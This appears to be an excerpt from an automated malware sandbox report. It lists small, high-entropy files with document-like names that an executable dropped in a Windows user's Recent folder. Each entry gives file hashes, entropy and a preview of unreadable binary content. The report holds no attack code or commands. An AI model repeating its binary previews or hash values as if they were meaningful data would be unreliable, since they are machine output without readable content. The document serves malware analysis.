                  Preview:IZMFB32.r\..._.O......... ).1....2B.b..mz..T3.m.R.F.d../.Q.S(|.r5Y{....O.&...Z..F$.}#Os..b.Q.....|..W.%....D....../..Y.....5.].....!.{Q....n.<..X...f..y.OR....&...A4..C....R7.k1.pG.....<"..L.....@..F&z.._....o.9.Jc.u<...J~.....z/WP]~......D.s.H.`.....5o..$w.q..NB,.$H......b.2....%d.p..^;...Y.........D.=b.....R...,.x%I..].=.....7..`..\Qd.JD..q..d..E.kag.]}..sn+.....KC.........k..w.M..8...V...@..].K..N..7]&M..i.n..i.......t...QB..$......m.g.X..X.h......1..?747.....Y.z..:.-.e..l....:..V..h.7....J.*..V,.N;x.2..:IX....../H...EzD.......X...e......I....$.00'Z...!|.2.%g.._r.m`}...x...H.Q.....Y:.&Vg.M....OaD...B..[.J..f..j...8*L;..N.KN.I...=.9S.h......e"....Z......./..M....A.'n.9..N.I..|bb..|q:b$.PG. 5...V*....f.}... 4<h..?.Xx.,......|!+..^....:.............B,..`rM}..[.vWV.WO.@..3....fD(.......D&...@..3. .O6....P...;T.3....H;?2@.,....D..w...{.a4~.G|.B.|...b...k1RZ..r.~.+.N.{..T...M...d..Lt..Q....ZW.& ..."0. 9.o..EH....F.....6..FA....a....Pt0.......B

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\JYQRBXFUOF.png

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.842712994256691
                  Encrypted:false
                  SSDEEP:24:8GpqJBZQcGHWGgCkgA8RHhJ6cqhxMq0Wb8Dz0Jm1fMxraAMX+owEQAItTxjcp3zX:8aqxQcY8gNJ7KxMq3b8LtMjwfp3nD
                  MD5:0BE7B19BE0A4D41495747908F94CE850
                  SHA1:39FDE36815925FE8B0E1FD6A49D7F072B778842E
                  SHA-256:6CB3E4DFE69A87212FA9F3025B3DDE810142AFA21D00FD6694E8A1EF4EE8A6CD
                  SHA-512:F68B6E0FEBFF7C7D230DB03E06DFE75FAB41215958D1D4F73383D5868801C2301FC9C80CCBF16E5970038AAD1C48BF1670C5EAA5A6A0CD90A415A4631DBE3A4B
                  Malicious:false
                  Preview:JYQRB..d .[.Q6vi.X.....6Z...i,L......#8.....3._[..._......Z.~.....+#<]0.}..e.k...Y.V..r.._.e..SO.....0......HE4`....<./.....g..T...R.....gB.r.n.f..t.giq.$x...m]....(f..Rw-........I...E&...O...s..r......c.a3*...wq..O...YI..d.[3..>....RV.V.K..q..o.(.6"G.....H_.^...l......L..Y...r...-..N."V......i.9+.....Q..%.;.+TrT.+....,....Y.X.O...LZ..vW....w._C......m.f.Q..6.#....:..lc....1=......A....zc...g...8..6.....2:,..-.b.L.8.D1O...`..).....~..j....|H.9)nS...P._.Np.V...@....d....U.p.!MU.v.Y ..5..T.:.:.L2b..;&.xJ.z,.3.LO...s. .........A.^F..}U(..O.HPU.u.f.*.)v.WU.R..."~..j_.L..9.@.5..j.U..E.N....F$.A..T..P...a....`. ..../e(H>)....h@...5./...S....*O..~..t..+K.g=..'Y[.1.3...v.Wn....#../....>.....-.\.u[.RdSe..(sn......T....5..E.....@..... YE...<.a.4..;..<.}..Z...0..k......K.&.."....>}f,....UG%.#I..A..B.Z.mR...=..R.jy.)}.z2.B..h..CB.....b[.Q...>.H.b.....%...#...2z..~@.....J.A.I....&....D..!S.>...#j.,.0..Ea%.S.C.......%....(.<?.6D-..4....IL.....DjDV.l.LT.S{.@....

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LCLZALVXRY.jpg

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.85270376587908
                  Encrypted:false
                  SSDEEP:24:TSWsuCTj19EVBrKmbUKlH456z8V27KxrcfkVuoIfBDAEABbYQZI093zbD:m5j3EV9Kyx23c7ecfvBDWfX3nD
                  MD5:5FCB6EECCBF59AAFB6510D3CD4BABA42
                  SHA1:08495FD039F0B0C3DF9C62A5ECA988D4130F14FD
                  SHA-256:F3319B4396B5D7C3F60F8B8612202CD3B452CD955335C3AC8E641F3C138812DB
                  SHA-512:0FFF2C6829FE65407E244A9D34D4332F771DC4EDCC98F78BBC71A5503CD4440241B2C389805C5BC4EA3F2FD5AD28BF85126ADB7E7077F4F0F9206F3BE0D2EEB3
                  Malicious:false
                  Preview:LCLZAWN..A.!.!.*I...v.$.dc..9.@".....3.....Y.......(>.g..4....7{0z.1.3.....nu.[&...v..$.-......%.V/.<..]...7...:Q...!.H.0.^8..<..L..r........T.-....(....U.....0.........q.g.LK....[.*......"._..,....%.....X..ll..lo.~.....@.&.~......l.x..I\..ER..HL.r4.3.CR..M<]=z.$.9./dA..n.XB.uA.\P..=U.!..G#....VG}$...Q<.Y..F........t...1...[....5..2..X<.J?.o.....l...A.s...7....;.R.!..Z..;..!29.+.H./....FsB..+O.J7,.o;-...UI-.Ka.d..?..!...\...8L..c.s2...T3..1......:...[...nJ.r.Z..c;I...J@V+l.DP.....#:...c57.f.o.~....m.............~....e.8..'x..O&[......:.#...6...9.....C..5..{.#.(B...0.f..m........FQ..,h.....v.....G.......f.z.......Y4...........')].....'.3.Di.5......j...m.....L3~..3y../.ze#...v...~...d%..5..|...?.Bh.N...O.......L.3...p.&...../.W..oM.k$R....s].X.0.=.3......o...:Y)Ce.w.`.r|..+.o.xJXX.y.K0.Y.!.Y..A..Q....w...:.....4.vb^....Q.8.s;...n.;....P.1.*.a.X..Qf.....>....`c;...0......r[g...q[......2.Tc...;..E%Lq.7e..(..lq..9$..../..&.:j..8vx1.

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LCLZALVXRY.mp3

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.852140862252882
                  Encrypted:false
                  SSDEEP:24:fY312hqh5TAzivxCgmJ3TRu84OG5eWsXshRgO8mMrYqre67RMt03zbD:fY3/h58exEtcTeWs9O8fPC67KO3nD
                  MD5:D72744BAA9825B3C8456D68CE93EC683
                  SHA1:3A86FA72EA62CF55C7625A3887DBA5FC32AFE88C
                  SHA-256:BE45CC475A4ACFAFD4A8FA644ED117EC7585515573351E03BBDEB5EC008DF2CE
                  SHA-512:11BD3C8D0AEA5C89AAA4B847E065A33245377326F701FFDF03E1A3C7C8620BA189B7AA55195D3B3407A8D2EEFB48B2313C9F2775A9D53BC233F9F92332FBE71C
                  Malicious:false
                  Preview:LCLZA.......B...6l...V..K.. ...Cl..$.n.{...B.w....M..m'...$=a..$.Ju....l.....(.e..1........A..X....Am.Z88Tt...s.4.4.....B0.UJ.o.Q.r.......O~.w{F....^;...}..Po........*g.P.z%!M...)<.h&T.D.|.~W..~k..."r.+..M+`...B.....y.6M.._w .K.^.fb.....>.})..P>.>.....;.i...8s...X.,..1C_....b..e...-).&.t.I..U..!..|...i...7..~HP.0m'.A....Q...<b.....].-k1.o9....V....L.U.]).m5..oTF...V.u..3.....R>.....{..h.Cw.:].z.5m.. ;*....n......,xx........p.`......Y....o3.v.9.U.d....xh%q....Gr.O..6p6.Q#?.)./.,o.....y..{.4Q.%<.].A...a..K.2H......uX.("8...-/Yb.u,.5.w..!..eA.V>......j..Es>..a.$...........&A]>...z..m6.K.....l5...Diu~-.5..v.....1td@3..........q1T.."...;?.....Y.s.-..jP.........a.K..ZH..@.d .7#.Q.Z........cXY..!..:p.e.gh....5.b....{..$y...{.f}......B.$..I.+.IF.j..R*.....^2...>~.f..M..S..mo....U...MA.q..yB."ab.........Z.iwVD..Itc..e...y....E`nQc...K.]w...Z..hB......B..........y......86.~..Tp...I%..$3.L....;..'.&'q....aF.-..La.acns>...Ybc.x.R..../!....'%a}b]?

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LCLZALVXRY.pdf

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.8458257431840055
                  Encrypted:false
                  SSDEEP:24:AjhOVdHiKuIHrPDsQ2hmF4lAn1PcIDupCL0YKVVozPiTss0FQwb0FmHALio89eHf:yoVdHykLslS4lAnCIDugL9RDwsFQTFmk
                  MD5:E5EDFA1EBFF708CE5C9FF9F86E388F30
                  SHA1:E3B0B94B1B02E665D09D63EFDAFB4E906BD94818
                  SHA-256:0425D0223908B49389A2BF3303E3958795D578D53CEF06431D1A1C0C84E1A41B
                  SHA-512:FACA129DD0373390909F0071827C4193F3858C80ECBA6EB97C2E6D7F523C70364347991876C9C2B262852CCD2FEDBB78B717B6A00D6C5498887666BB676552CB
                  Malicious:false
                  Preview:LCLZA...I.X.B..!.......6rj.>..X....tfj..^.....g..(.P..!..@.N....g..q.m_hM...e9..16....#x....g;...7o....j.Z.....H9..z.O....z+4.$..~J./B!S...v....T.k......r9.j."!..3..2L...s$.>e.lw.........$...;....k...iK..XZ.zh...`).Q....UO..).../.z....-Q.5.\<....Y..H..p....nu.....Y.L..7.......F.:H.G.W.S.Kj.*M&....z#...2...fz.r..9,c...E.<..--...D,.0.gQ.S!y.Mer......_.U.&....7%.N.(...6.....dB.....v..6....k..z...%.......f...F..`Gy].z....z.L...`......p.5m`...q...~}..J.....FC...rs].....mj`.S.K.r.5.......,...$.?o.{.*.T3M..{O..RtT.i..d.?.jd.f............|@.`l...n.?..^.8.\.....W.u..F..w.Rq7.6}......d.Tp..@.........N.c\*e{1.....dD.}y2$kMi%..@'...j.aQ...kD..}..bt....z."/...4.'H...H..NE.....$.].7....%...j.(....+.z.k..6B..1%..U....j.g.....q.5...".,.....!..KQ..!a....cSG%=e......L.S:.%.,..^.!..h]..]w.s.8Q ..,.8o...u.L..|...m..L...C.....t..Fi.#..Y...9....}.....sz..^...@}..Lq...X.Ee.`.........9._..S.M...J..f.......y...>...op.T.;Xsj4.u[.Y?. ..i?.Xh...!..u.w.G.....Y..9.....[.G..

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LFOPODGVOH.docx

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.845439193355527
                  Encrypted:false
                  SSDEEP:24:GE1EftvisA15zR0cg6EXtpzc2NarBlZnJJyxgUeVPdmQvDThX43zbD:GEWfMsE0B9pbazZnJgxR8txo3nD
                  MD5:B74C3DBF821DC08AAA6642DC737651AD
                  SHA1:459F467AB1CAF879A6C1D9485BDE271E15C39B7B
                  SHA-256:A0E5B1E23F3308E022FAD04E4C13C973767C94466CF1F2B6CB6015608B7EFFD5
                  SHA-512:E06D79616482D8C733BD269C9EAE9D5A8180E36912F56240A8F1C71583B0DA6847C31F03A014CF4BDCC657A217FDB52A021FFFF67FF74E5705424D967A8350FB
                  Malicious:false
                  Preview:LFOPO.S...F"..Z.6.,.Y.....4>:...m......8.j..';ip......u...'^Z.."#;a#w..[..[.@BV.^..N.X...D~,...R....X.^u...Z..~....j.....la.$z...a..NP..O...R.;.|.B^.{.......q`N..z...2L.._cXTR..7UC*...7..H....nf...............;.[.0<...k....4..6.r*e..G. ....H.7.i.8..N..F.&..6.....!...:..D...!.VLdN$r'...N.1..m.../.;.].....2..".@..:.....XvNz....Q*Uf).c..Az.....oO...d...i.R..PDR......b..]....G%...yj.>..8[.F.....C.m.w.+.[_/...Q.....RJ.G..x..<:.n.ePO.$...]j..I.A.4.xu.$W.?....R...V.J[:. _...7&..\.F.J....O.6{n...v..Mb..u8[...{I.}h...8Eq....{a..T}X...yO.4......F.gK..R.I.p.4.?.C.`>E....i-..<%/...h.A.?O.../.y..s>:l.+.....<....[?\L._....Y^....o... .K...sFD.....mj%.^.X?..:.x..#.s..I..x.......,...H.aC.M.......:Y..n.8'6.!.q.t.tlI...xB..+%......U8..q....K.m.t.L..=wl.l......0....xU.3qW.=.(."..H......o..>L].F....Ibm...t..[Y.o..3..[=1v...LS..(.b`....?.. .S) .B..a.t..eN...(.T[....Z*.P..AF.....8~-*e.UD..).EX..........8..=..u..<H..p-.V./...(.O....h(..0_........`..GL..t...[..,

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LFOPODGVOH.pdf

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.84640040212016
                  Encrypted:false
                  SSDEEP:24:X3J2pFMk4Pv82ghYiXVhENgVVVJ41aLF225M9FSojrGGS3w5vq9ySMf9t3AdPzkB:X32F3A82giMEoVJZ7KnWPyj9WWsRaT3D
                  MD5:185B797B2B792E736D937C1D5182E8E7
                  SHA1:5C63B366E869A1BB00AA3CB3D43BBBC49E61BCD9
                  SHA-256:9C4E2737982FC06A327DAC1CE1D3CCA7FEF433303FB38EE2C840E001FD5BA7AB
                  SHA-512:E7A56E6A731FE21ED5DAF80077426F5DA6B595BE6CEDCEB33870949A9F9D31DF9C7F6C43C8E69ACF21840895C22B79E5249EF2C1BD1B978C3E0900A1B9A03E88
                  Malicious:false
                  Preview:LFOPO.t.u...9._g..5...7..-..9.;..+Z.u.E..NU7?"^.c.X.......[..k%..._...V...%.V..&}j.).5f:f..|....u.9!l...k....-N.....L.....1.\T]...v..K.....8ZI....7o/.7..W.uWa....J.....YcBZ.,...V...}.]!Do...Uu.&)<..^.@|.....T?K<.g.Nmk|.../..tP..^.(e.K....}......1C.w5x..7J\.c..Q.:..e....3.........F.:..f.q.. ....P.&.k...\....S..mMJ......#..'.?...V.P../.f....|j.C..._.$l.|o.J.*~..%.eLD..M...bN..K!...%...hXh..m{...hv..:=d......O...O.N.+..3w.\}P...J.?.+E,<.*.%6...\i..-...r..$....e.w\Im."+'.d.h5%H}.Qu.s .X...b....~..y.W.ykn@s..a.A....y..r=.(+.)...|.|^C~B..~.E.H..%q.j....1.*...I.g...T...0u.&..>|.O....}....!2..:..R...].NpD..Qf.Un....M>....[W..,W.9T........j..1..!1|]Q....Z....n....{-D..o....;..D..nBD..93.._r..I65..g...7@OX".w.*........._..z..f..5.u..N..Yi.\...1q"{%>..H=l.HSsW.t..C2)..y.....K......0....4HT8-....8Z:..Q.~v.8..d...=..k.F....C..>...+-.....d......z.{.....y....t......6NUU'....,...Y..E.P..*....~.f.Fe.......+.R.Q..%.w.?6.T....5..R...YQ.......L....3..}...w...MQ..p.j..8...

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LIJDSFKJZG.docx

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.8549329365103775
                  Encrypted:false
                  SSDEEP:24:DqizaRGs5n4p+BeqHv/twdQARh2xFL+3LXEcKA2kbRxmCK1a9+zR3Mk3zbD:FzaRz5n4UegdXAT2i7EcKA2kbRJK1q0J
                  MD5:16D6B77A619EAD2A99AC7F6765A8624E
                  SHA1:DC77438856DEF1BB58A5C212AFDDDC3EB092A9A2
                  SHA-256:92128E73C38484D2645297C03686A99E07F7793EAEE3B3613E5904C2FED02E47
                  SHA-512:32C5BBC6705824881024A298526B8F959BA4BA4705A8C98E90F57F1EABCE3BCDDFF18CFAA6DFA707208C7F176E6CB177DF0C536565D4C5EB81E46E717179E12E
                  Malicious:false
                  Preview:LIJDS.y........@.{..H.....N.mu*..O?O...hU#....1.0x.g`....Nw.B..`.Qm'.!^.Mj.8....(7.3..9.......}j2U...TS.\R...g.&.a..gk.a.]..K .>..|.E.:3. $.V.9....y..L....|.$AA....w...{....%...8...;.^o.v.......I{.de25..ig..~.J=?..n.|....../.9-.R.qF3".H.qw.1.)=..^U.<..g..|..P.X....}...y4.oq<.d.i.f....!.0B].+3.....-.~.=V..Y.g..l"...;ki...C.?q...4^_p2....n.'^.Mo`...vp...MC.J..E.H"]...m..........,.dy9..cZ.[W...b!D..|of..[a...o..D.....oP..d..'..vc....)!>..<.Wz.M...I.N..;..uEV....l\..=..#..8p......K./~..;..g.W....)Eo.......u...&.{..{.v]!..Cc=....i.NZJb&.l....\!r:+.M{rn'.^.!.>....@+jG......?..$.6..}.k`.^n..f*.H....K.3...,.......y.>{{.qb...sw...[........`e..BD=0y.9..s.b.L.qQ.._...0..-...|..26....iP.[...=q..Kt..u.,s.?$.....pL.]X...xy...<......u..S...8.^.....>....c.M50..-.P,..3$^.Q..=....@D...Y..K8..U.......M........._a...uv..Hy_..|......B..5..j"9>.v...M];.5.....ar..&....`.......4,@Yb5.(.;(kv.....f.P.e..&....X..:eak...m.`E.t.-...h;~P......V}..<6..qW...[.@...d:.....S...

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LIJDSFKJZG.jpg

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.827946588417522
                  Encrypted:false
                  SSDEEP:24:zoq2AklnGaGi5gHnCN0+29oCwRPdNNHEgkbX1vLP9ikFwHyUL3zbD:0fAkokgHV+2KDLNfc1vD9jwSUL3nD
                  MD5:47E0C711116F0DA9938E0447A28EE2C2
                  SHA1:7102CE82CA571B6CD59CE863BDE11DAE713168BE
                  SHA-256:E7711088BABD75C0FF18126CB0A75D9E676BBEDD8D4A59135CEAF382CCBE2E22
                  SHA-512:D197BB251E8D42AB83EBCCBDAC320EBEEFD400D7C8490427435CEB30582F5AEAA4609AC492C8D3CCA4F554922E447A5131DBB7A27ED2AA50410B317E5BD3F04C
                  Malicious:false
                  Preview:LIJDS~/.'.B..T.s.K.E%........caa2.xg..W..}...)!..s,<>.%:+.>.*...R..../...M..p...........$..X.>..=..|..b....g..m.2.ra. @d4...MI.`2=..J.p.Y....6..<;...2.x}.8..b.4D.$i.o.T5P.!......X...V..j~!..?8.d..vs....)D[.d.Fz3.&.....y.O...9...Ei..g.K"!.\..$3Q..z!.h..i.U^..8...#7..RP#..#.b.g./.fDF.pY.t.y..9.:..?.O.F.b.11.u2.\fMg.'...HH2...3.C...Sr./.5.,w....3X...h{..t.Hm."....$i$1.....wf..c]E+....\i0~..h`.f.g..hxp.L!.L..../.%|.r...U.w...1._.e9Z.I....nF.../....%A.?D..$..w.....u. z.?a..*..z..)@O...2s..E2O+.^......o.Y...WC..Ek...M....mE....\^o'.....7..t.=.z.D....P..L:UI.N.j.........g......%....N.............!.2..j....C.C.....U.f..l..C?....".6m....;vM'..%...wb..#..5.d.....r...Lr....!.....M.).D...6..J!n......`.... ..s.YL$.@#.n,..P.U1/j....W..........iB.n.v^..3...U...VB4X%r..'..L..K...*.....s.....&Uf.tgt......f..M.h.}sp..s....~.D....i...7.....&.~!vj.D.t.x...X8..2]..vRK...x.o...LL..4j..rJ.+].[../..&..R....D(.FxK...'.".C...N.a.IEVt......./z.......=...'g.nE.A..

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LIJDSFKJZG.xlsx

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.863445575475765
                  Encrypted:false
                  SSDEEP:24:A/c3O7imGpMnwxTiZhp3HbVkBVSb6zwr4/YNNY8tuQi1tK1hY93zbD:A0qfGpMETum6OzwrCe371293nD
                  MD5:52236544E200C8B5071ADD9B911A85C1
                  SHA1:C96ED865D7C26CDFB7F7E36FA5AABF76EAB4E2D3
                  SHA-256:725C22EDE02F25F3BCD2540620846EC2B27F9DF47BED8EF5135A27A4F47478F2
                  SHA-512:9CD2069A5F6F347468B30C077CE6E65DE548F3D64DB4B5317B3ED24559F516B78C7D79FEF7E04FA5B7C7E119BC29ACE21E0E3BEA025DB15BAF9C39322062A92B
                  Malicious:false
                  Preview:LIJDSc1......nIs...:....._.;...t1..~.|......).}....e.....?.q.[....3c...[....L%9U...S..!X..Ff.^K...7..u.kM.....VT...@.j.~0 .v...._.}...{......N;.LV...,).....thZ.y.Y...?../.Z...O).........>...]...yKPT.F...a..X....0...R..D...ra.^!.i".3.Oj.........!..tw.#..$.....s0."....P.;...'2K.`):.O......H.....+...fX....M...2X.n...,.G.&L.!.....x.%Q....nC....6"~.....^.../....<*..*A.....E..Ro......|Yy..)$............C.I......ne..J}../.7h[...]...8."..`{.....S.....&S....n....".>...DP..+.,B....Z......@...f..|......'B...H....-.N.rq.m}p......."....(.!..q[...R.....s...B...."zd...b.:.;.._Rw.......l..i..+(f.;.......\7...A...0.<...Yd.\Qw.Wk.A.lHW..P..9.7....@......v...#H...i.........:H.........4.....8...(,^.B...$.kV....g...J.q.Dn.^h..b......i.{...]...c1..=...{..q...c........<....K.%...2....w.+..p.(...I.D..W."&S".z7.9..L.....8".[.Q|....'.g%.\.h;-"....p.P..R........_.....u.W..S...F..+..h...........;.s..}Xs.l`.|G...x.D..E.3.....?.j..W;;Q.....y..1.6C.....s.....WS.H./...(E..

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MNKQCGFJDG.mp3

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.846257323599437
                  Encrypted:false
                  SSDEEP:24:k0PyxjZMYbHgUz2CGhW/3k89vesDBrSWZUXGTz4lhoWqmX0jEjEced9AYM3zbD:xCjZMOHgoGh03ney8XonjEjXF3nD
                  MD5:7ED18B090BBA5E6D5E4A1549840A15FC
                  SHA1:DC2568738822BD16B1B5A2246A93F7B1E22A06E7
                  SHA-256:98D549946FBE0B60CB801ED7414A76CC82A02F26B3C076643E23DDF232E2DF2B
                  SHA-512:09BAF18FBAF7F506EC3D0A2826A907CA7B1E2BE9A552F427D84E24813AF2BA9D79FC02B6784728655BA3835AE741137FCFA0D7D7045C89D2AADEC700E23EEE40
                  Malicious:false
                  Preview:MNKQC........2.....VmkX..Z|D..M.h..\$.e....}.....#.&;.p......xM..E.\X...# .\y(M|z.){I.Y.{.XH...W{.>......M.....Eit...Y..S.J..W4do$.>F.....x..]..-C%.......uZ>..De.....*.1/.{.AGV.:..^b+_J../.y.%...g..>....l.C.0..%..`e...|...fV....\s.. ".M..W......lj..K#I..5..C.U... 6.h.....(c..T .....D.;...'..v8..B...yX.+jo9..gE........Kk.;.Za.$I..mC*.\d..._.b].A.G...R..\.tYn={M..........r.v.n......R...!....=.L..V..Q.....p'...oD.&..}.Q..U.L..M......z..F..... .nw7j...:S..K./m..f. }&..%........V....j.o...C.. .4....>/....~x....&......K$..5.0...cO+.*.[.f...2.=@Gb...F&....jbb...Nlg-l......S.05..Y.E.B.cV....4..q.IT9.g...o..KSS..X.w.....z..m....j..x....f.d.D..m.U+.f..]:P.4$.?..K.......u.gJ...g..k}...Z.e.>27.pb..`Xb..:u...`:.[..J%+.u..w...*.$s...<..."<..1.eP..x......"o.(..;k.I..&....r;.M.T..T7.+...v\.h....\.d.M.Z..GY..J..q.......N.z.X.(.>..U...p.qCvH....,pX..X'M..C..K][[;.jFA...f..Q...+.U..9..Qk.<..@...a3.5.{.....4.]..a../$y.....O..!.g.-.n.+.E.r../..a....].s...

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MNKQCGFJDG.pdf

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.854425365621791
                  Encrypted:false
                  SSDEEP:24:d2+Kl6Aqo0T1yKcRhJvhf5ZzGELTEt1C5NQ7Ly3IHk9QjCMSSneES83zbD:QFkyK0zvhf5ZTmKNQuIMQOMSSe783nD
                  MD5:F2487E7B9AC2CF043B7FA7E9267943E4
                  SHA1:98CF64FD56B6FC0F7D6B56FFFBBC63F0BED34316
                  SHA-256:421CDC1F48FA085F1F45D336EF7974FA43170FE09FECC97BAF17A060670C2D98
                  SHA-512:1DBD4930885FFE36B90EFF8A01A484CD330EE9A81ACA454B11AAAED9A52FE2F31E3ABDD72BEC6C31983B1B44D03DE12FF26E45EAB781091B9800A9F1AE0C03D6
                  Malicious:false
                  Preview:MNKQC].Em.....>,$z..w...#C.?...:.{.w*..U=3y..'R...G..[...5E...B.........:..+?...=.......p._...^..C."..`*v...M.J}.*B...]#@.(@4....l...4k.$.7...c..p41.K5.'.n......G{.}.....9..F2.T.\..A%.",.)....D...\..~0...v.....8|...9.?....;..:.j..t.....$.g....2....x"z.].N.~..........I.dI....A.D...'.....w..1.........)U|.f.T._r.1...B...[...M`....PX..+|..`.g.a..M.,J&....(N..b..]m..3*...Q.....,|...;.A).7.....p..+*%L#.b#..2+...4..1.m.+BfC}[G#co.:tN.lb..S..e...o...h=.i..r.cb..`..b..c>haj.,..YY%f.i.L...cp......UzW..Q.....X$C.^p.q8.........On.;.V.........&_PSN.`V.`{..H}....$....(KU...........kQI.L.n..C.......c}.K..YY...F.v.#.E......\u.......=.6".!k.....U.................l...$$A.......2R..3.....=Q...lmM..Y..xE..O..._t.i....zM.'.7...+...X.k{....G.....N[....hK...{..-..Je.D.q..|.~>.]..q...*.{..8?..F.k..l.w\=.C.C_...P.[eM..Y../.%5ae..P.........l..1EC...S.!..O....E......5..[.....[<..-.i..|.8.....-#|.1...(}]D......'.......`..S.....j.k..:.......?N.v.!|M..B....

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MNKQCGFJDG.xlsx

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.814959026269785
                  Encrypted:false
                  SSDEEP:24:eHkR9JqddA3W60qYQGv7qYthfbowovj7k+qAukurbfR3l3rkhyK81XDV6LnqJ/Tl:skidA1FgDthfQMAurbJuICu/doe3nD
                  MD5:6B2E380FF2E53E14E92D255D64E86F01
                  SHA1:FEDC4EF1C9B80C15D778743D6A32EF341E6A00DC
                  SHA-256:710D656CEEB23461228B23B53B3112022C885943A485F1AE9545C6771CC9C0EA
                  SHA-512:55F2AD51C85BCE553351ABCBC7FCD9FAA4E0F0CA4B2E7EA5083AABCB74166111E8952A05358244C38D22C96BE7EAA4CCBA23F303613A5F394394C2A669E8EEE8
                  Malicious:false
                  Preview:MNKQC.9...R-..l..e....POH.B.....A.ee.....e._,......;x.........%.....4`/.O...9-...j.........K....U.H.0....y.1JS...1(x....ec`z.....(<.$.E...Gm..%.._..On..QM6......$.@.c.x].l...u.....5U..W.!..&21.i...m..ho..d..T..x....w.Y^.:d0P.&..(z..PE....B.i8..ji.......a....|`.0........{#'s...z....A..m.8..>..Y.c".x'..9.Z..h.1AJK.G..4..[.)v~N"...kp..........Q}..|x..kY..*&..l...K.5... z.5{...7.iU.Q.thP..Q@..s..)[.g....y.0^.m.......;.r..zP...N..nV.......3q..@.a..-.'..2A...B .z.1z*. ...U...o.V.;...a.5.v..l ....p.C.4....@7.A...!.J...oY<"$..pKQV.6...f.E....)..;..[.y7.[.}_B..E...%.Q>....S?.E.t...O.....w^0.Bh..cg..F......{S..8..9f.;...F._,.k...1J.T:.....Q\8T...b....Q..Z..M..@..T.VZi..mG}.0/...;\.........&.Jk .Nl....e.V.2.f..Q.f.kT...s-,(.I.....\....ME....R.Q%..w...G.#^./.Y.59%..")h._.2..H&.....3.i.a.......9.^N...v.......@..{.MK...r;>r.'.L..%........&j8H <-luV..\.tL,Rm."..B.]...,....Jk.6Mlu.+6e...r....\W.:y.l..Srl..qH.s...>.z.....?..&....IRY.7.2.M....dxwJ..U.)...

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NIRMEKAMZH.png

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.8440331648206385
                  Encrypted:false
                  SSDEEP:24:ni5kX8jn+KJ5sRo9ShN9j3iXPfayTdzlnyQ4ow4cBve5I3HvFqY3zbD:xX8KKJ5sRocN3cPfay5zx4jdMIXvFX3D
                  MD5:65D098E3FAA16A012FB512615DC9F78D
                  SHA1:F9FD223D44D89E6B6446BDC2C62EDD8AFFD32D70
                  SHA-256:8F14188D459A8475B7201285FE3F5EFF1F3FB5EE0EE231B8E8756F72D3EAE682
                  SHA-512:5737A8A4048268A0ACB9827773860AC45EABDC5B2E77E8FC42990D623535F31C202E425A22D57311EF498F43751A46885965BF6D637F7FE31E67A89531A16B4C
                  Malicious:false
